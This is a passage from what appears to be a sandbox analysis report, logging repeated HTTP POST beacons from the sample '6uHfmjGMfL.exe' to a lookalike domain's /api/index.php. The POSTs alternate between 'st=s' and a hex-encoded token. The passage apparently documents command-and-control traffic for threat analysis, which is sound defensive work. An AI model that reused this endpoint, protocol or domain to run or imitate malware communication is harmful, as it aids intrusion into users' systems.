              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:47:02.336062908 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:02 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BzqKsnPNINPSbsPjFXK%2F3u2Iax94xZY4C5yQGA6vRatJGP8XPluvt1G6pTOeA6fzuprfj9m51o0f%2FEWIlCSIFse43l7EP0XqeV21rddNpJWJwkuUnErnJsL%2BbJb3AgLDmB3ygDHxyfvseeTjYP5Twb2WBSmtyA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea93c21f088c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1919&min_rtt=1919&rtt_var=959&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              84192.168.2.550059104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:03.967138052 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:47:04.610625029 CET817INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:04 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=96SAk49qgdvSSOQ7pMhiNo1OAqVL5tAUaRB2aXftDkPVSftXJ5FH6sdoz1PEfZhCDLV6MXlrSmgQPETUbQdw6jQVVVtl4wO%2FK%2BV0btvxGbLlW4aBztDDpXgNBtY9son5y%2FGq7ht33AZ9Yq3xlXCwLJvKH2e8%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea93d06e7d43ee-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              85192.168.2.550060104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:06.138837099 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:47:06.771224022 CET827INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:06 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GZ9YGQBMmGA88nn2F%2B6C%2B0lSP7R%2F2PVYVgUykuyxf%2Fi8VdsRhG5y0sizXemdmgeLWAqjdeuVyW03vQGNvreLIb%2BO2V29T1kFkcDtyALae7BFxVmhEXxIw8796KdgRHO%2BN7XJbBGiTQmtjeMXn8RoSxxGUMO0Cg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea93dddc0a8c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1990&min_rtt=1990&rtt_var=995&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              86192.168.2.550061104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:08.430006981 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:47:09.056909084 CET822INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:09 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yRBgYpmyDfAeys7NYeDJdq1K6%2Brq2ZpUP0QPvM3Ypn5WaC88Hc54YKJsSwmB2B9Lw9K3LICcIiQ%2FkzAp0cEujUa2uzoNDPwi9FxGaYG6gLGHao9Q0d9t0l9Y%2F0KtYPogK%2BWoZMtt1i%2BbabW2o1%2FEfASEnKBPcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea93ec386a7d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2011&rtt_var=1005&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              87192.168.2.550062104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:10.588701963 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:47:11.229614973 CET823INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:11 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6NYTnSffLPWpNywu7dTGGyDyh2b%2BIa7lMNxPpzR950I0QYSrt79LwKn0ZKTS0zWjRj9aAwvfYTp%2FMfUgd89w0BEqqxtBs2vluMEZSYpTxbBvhZT3eLC8xtmwfGkp7L5nf1LNSbp%2Bf%2FefkRm0IRaVEG6bHXW91Q%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea93f9b99c0f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1443&min_rtt=1443&rtt_var=721&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              88192.168.2.550063104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:12.857634068 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:47:13.491180897 CET818INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:13 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5uj47Mh4dRdLq%2BGgzT4q8yXzwC%2BTR9BDGFQ8cy5eEXqQiA0Rmv9bOtsXk6r7nQiNE3h2My8HY25pK48qzrGXGlGnz0sMKenzxp6iLXW%2BblvqjromKscdYo5UxAXcwK9k8ob0DOsJoCs15xUxBzBg5U1%2FmjFkw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9407db1e7d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2018&rtt_var=1009&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              89192.168.2.550064104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:15.015047073 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:47:15.677457094 CET823INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:15 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BBObTovG%2FNDhAEm2XIu%2FyyL6WygWo1l54ZEBEyDAo0szseN9PpTVVbKXed1ttrUdw1nWeHh%2BU2R6V2sSet2sitsjUGrMzlU4OKFxMZHJUFYsEXuMrQTReuoSAKUk7MDAS%2FABnhEZDxtVnQIflV21lnptmHmkIw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea94157c4542d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1571&rtt_var=785&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              90192.168.2.550065104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:17.311474085 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:47:17.966834068 CET817INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:17 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GtSLGvVG0QYm7C0985mA03cmN4Fzq7GZW53CvsqxpWDJA%2Bvf46qc2n%2Ft0RxF0Qugal58NynKGq9JDVZNWTEwa0JVeOAX559OkURFm%2Bh6dcz0%2BfqGBpAyLoTOyzC95P6R5rdXiFxs6m1j2rkTrLBgzewneJMHgA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9423d86d8c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1967&min_rtt=1967&rtt_var=983&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              91192.168.2.550066104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:19.486701965 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:47:20.142399073 CET823INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:20 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HHtgD23wVkpukEVC6dz6mQWR%2FsXvFwxjgOjZInS4UgCeCN8QQPbiMTX1%2FYAbRBjd0jhng80mymcED4pptjBWwQK6pX6ux83ZuDQpeef0P7Fq6c90155Cmd7pZ6lb%2BHaKeIRVtFkB6b%2Fa4VTVNnMvf0IfccwBlA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea943168037d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1988&min_rtt=1988&rtt_var=994&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              92192.168.2.550067104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:21.779207945 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:47:22.416116953 CET823INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:22 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bzy1W21AaLt6pkPmDSDrKaKOcn8nqF%2BzxfS79xcfe6bduOxpCHLiF%2B0YGHzuWHQmhiY3nmDBcWqo8375ezSVwaTP%2BS7tMp3eDF8Rfs8XG%2FxTzZvUo6J%2FRMNWcX8rHNm8OqgU863D%2BU8oPjr%2B6fnRQePDo5Xulg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea943fbe5a0f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1442&min_rtt=1442&rtt_var=721&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              93192.168.2.550068104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:23.938900948 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:47:24.585119009 CET823INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:24 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hz7cccwJ2yloscr9DvB5ThXwmPH4FHW2sQtj1Zc1mmu%2F4LAD7C7fa4m8yHdwppkOPz%2F3Da8Y9xPp7XCXRRnvPtOaMdFD6Gy0%2FRz1g%2BA6ri8vtvkIAZtvm1P4fvg6WPTZhSGnsN2QYMe4jyx5rEOjHktkv1UsuA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea944d3c310f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1405&min_rtt=1405&rtt_var=702&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              94192.168.2.550069104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:26.236154079 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:47:26.799917936 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:26 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1C39SuEYibQChu8jZ28h40lwZoGT7muv4eZP8oIROvFkOhDveiRdDe3wHlf0f2Bw%2BvdmgqSu5xHleCEpVtRSyM%2FPLSh6fsRw4rqI5A8U8Iw3%2F%2BUJ84%2BqkGDREhh%2FElMcvNvyfk6SMss5BdS9sQYGNUXf3BQTaA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea945b9bb943ee-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1711&rtt_var=855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              95192.168.2.550070104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:28.312567949 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:47:28.946984053 CET827INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:28 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eGMwhMU9PiE8YWXVkDyumkzCPCUdEiJ1rWe36IRSdqL2%2BD05KbEPfsrCIp9%2Fhvbm1gOrkn4LGd6lowZmEi%2FgA6oiQ0IWuKFzxLFA%2Fjv3ur9xZweGc9A0eoCyC0TfI8KCRQwZq7z%2FeTm5Qd551%2FKQ3OsUID2bqw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea94687d227d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1998&rtt_var=999&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              96192.168.2.550071104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:30.733923912 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:47:31.371124029 CET813INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:31 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GMwhARAER48ejXd8NqKuCmT%2Bsx0pkLMHw6OqSe9cTw1HZz2NQ8mp8ZHLGrRWlxixqNce7gxmBhwAhHihN6fqhoVFg9%2Bil0jFrWYEuHPlblj2yyARtVJgO4yEb0vbBd0W6xAcCKceiql61N8UgrMh3nBD0I9okg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9477abaa0f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1555&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              97192.168.2.550072104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:32.889921904 CET326OUTPOST /api/index.php HTTP/1.1
